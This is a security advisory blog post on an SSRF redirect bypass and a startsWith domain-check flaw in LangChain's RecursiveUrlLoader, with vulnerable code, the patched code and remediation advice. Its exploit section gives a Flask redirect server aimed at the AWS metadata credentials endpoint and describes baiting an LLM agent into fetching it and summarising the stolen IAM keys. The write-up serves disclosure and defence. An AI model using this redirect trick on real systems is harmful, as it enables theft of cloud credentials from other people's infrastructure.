Feb 25, 2026·5 min read·14 visits
LangChain's URL loader checked if a URL was safe *before* fetching it, but let the `fetch` client automatically follow redirects to unsafe places. Attackers could use a 'safe' URL that redirects to `169.254.169.254` to steal cloud credentials.
A sophisticated Server-Side Request Forgery (SSRF) bypass was discovered in the `@langchain/community` package, specifically within the `RecursiveUrlLoader`. Despite previous attempts to secure this component against internal network scanning, the implementation failed to handle HTTP redirects manually. This allowed attackers to supply a benign, validated URL that subsequently redirected the server's HTTP client to sensitive internal resources (like AWS Metadata services or local admin panels), completely bypassing the initial security checks. This vulnerability highlights the classic 'Check-Then-Act' race condition in web security.
In the modern AI ecosystem, 'Agents' are the new hotness. Everyone wants an LLM that can browse the web, scrape documentation, and summarize the internet for them. To facilitate this, LangChain provides the RecursiveUrlLoader in its @langchain/community package. Its job is simple: take a URL, fetch the HTML, convert it to text, and feed it to the hungry AI.
From a security perspective, however, a tool that takes a user-supplied URL and makes a server-side HTTP request is, by definition, an SSRF (Server-Side Request Forgery) candidate. It is a proxy for the user. If you don't lock it down, that 'helpful' agent becomes a pivot point into your internal network.
LangChain knew this. They had protections in place (introduced in v1.1.14) to block requests to private IP ranges and internal metadata services. But as any seasoned breaker knows, security controls implemented at the application layer are often brittle. The developers made a classic mistake: they trusted the HTTP client to behave safely after the initial check. They were wrong.
The vulnerability relies on a fundamental misunderstanding of how the fetch API works in Node.js environments. The developers implemented a "Check-Then-Act" pattern. First, they validated the user-supplied URL against a blocklist (checking for private IPs like 192.168.x.x). If the URL passed, they handed it off to fetch().
Here is the catch: fetch() defaults to redirect: 'follow'. If the validated URL (e.g., https://example.com) returns a 301 or 302 status code pointing to http://169.254.169.254/latest/meta-data/, the fetch client blindly follows that instruction without re-validating the new destination. The initial security check is rendered useless because the URL that was checked is not the URL that was ultimately accessed.
But wait, there's more! The RecursiveUrlLoader also had a feature called preventOutside to keep the scraper within a specific domain. The implementation used a string-based .startsWith() check. This is a classic rookie error. If the allowed base is https://company.com, an attacker can bypass this check by registering https://company.com.attacker.xyz. Since the string technically "starts with" the target, the check passes, and the scraper happily leaks data to the attacker's domain.
Let's look at the logic failure. The vulnerability existed because the validation and the execution were decoupled by the fetch client's internal logic.
The Vulnerable Implementation (Simplified):
// 1. Validate the initial URL
const isSafe = validateSafeUrl(initialUrl);
if (!isSafe) throw new Error("Unsafe URL");
// 2. Fetch it (Default: follows redirects automatically)
// The fetch client receives a 302 -> Internal IP, and follows it.
const response = await fetch(initialUrl);
return await response.text();The Fix (v1.1.18):
The patch in commit 2812d2b2b9fd9343c4850e2ab906b8cf440975ee forces the application to handle redirects manually. It sets redirect: 'manual' and loops through the responses, validating every single hop.
// The Hardened Approach
for (let i = 0; i <= MAX_REDIRECTS; i++) {
// Validate the URL for THIS specific hop
validateSafeUrl(currentUrl, { allowHttp: true });
const response = await this.caller.call(() =>
fetch(currentUrl, {
// ... options ...
redirect: "manual", // STOP automatic following
signal: AbortSignal.timeout(timeout),
})
);
// If we get a redirect, extract headers and loop again
if (REDIRECT_CODES.has(response.status)) {
const location = response.headers.get("location");
currentUrl = new URL(location, currentUrl).href;
continue;
}
return response;
}This code ensures that even if an attacker tries to sneak in a redirect, the application catches the new URL, inspects it against the blocklist, and denies access to the internal network.
Exploiting this requires a server you control and a target application running a vulnerable version of @langchain/community. The goal is to exfiltrate AWS credentials from the EC2 instance running the LLM.
Step 1: Setup the Trap
Host a simple HTTP server (Python http.server or Nginx) exposed to the internet. Configure a route that redirects visitors.
# Malicious Flask App
from flask import Flask, redirect
app = Flask(__name__)
@app.route('/innocent-looking-page')
def trap():
# Redirect to AWS Meta-data service
return redirect("http://169.254.169.254/latest/meta-data/iam/security-credentials/", code=302)Step 2: Bait the Agent
Feed the URL http://attacker-server.com/innocent-looking-page to the LangChain application. The validateSafeUrl function checks the domain attacker-server.com. Since it's a public IP and not in a reserved range, it passes.
Step 3: Execution
LangChain fetches your URL. Your server responds with 302 Found to the AWS metadata IP. The fetch client follows it. The metadata service returns the IAM credentials (Access Key, Secret Key, Token). LangChain converts this JSON to text and returns it to the application (or feeds it into the LLM context).
Step 4: Profit If the LLM is chat-based, you simply ask: "Summarize the document I just gave you." The LLM will kindly reply: "The document contains AWS credentials..." and hand over the keys to the kingdom.
The remediation for this is straightforward but tedious: you cannot rely on high-level HTTP clients to handle redirects securely when SSRF is a threat model. You must upgrade @langchain/community to version 1.1.18 or later immediately.
If you are a developer building similar systems, take note: Always disable automatic redirects when fetching user-supplied URLs. You must verify the destination of every hop. Additionally, never use string matching (startsWith, includes) for domain validation. Always parse the URL using the URL API and compare the origin property.
Finally, application-layer security is your last line of defense, not your first. If your AI workers don't need access to the internal network, firewall them off. Block egress to 169.254.169.254 at the network level. If the code fails (and it will), the network policy should save you.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
@langchain/community langchain-ai | < 1.1.18 | 1.1.18 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-918 |
| Attack Vector | Network |
| CVSS | 4.1 (Medium) |
| Impact | Information Disclosure |
| Exploit Status | PoC Available |
| Patch Status | Released (v1.1.18) |
Server-Side Request Forgery (SSRF) occurs when a web application is fetching a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application to send a crafted request to an unexpected destination, often bypassing firewalls.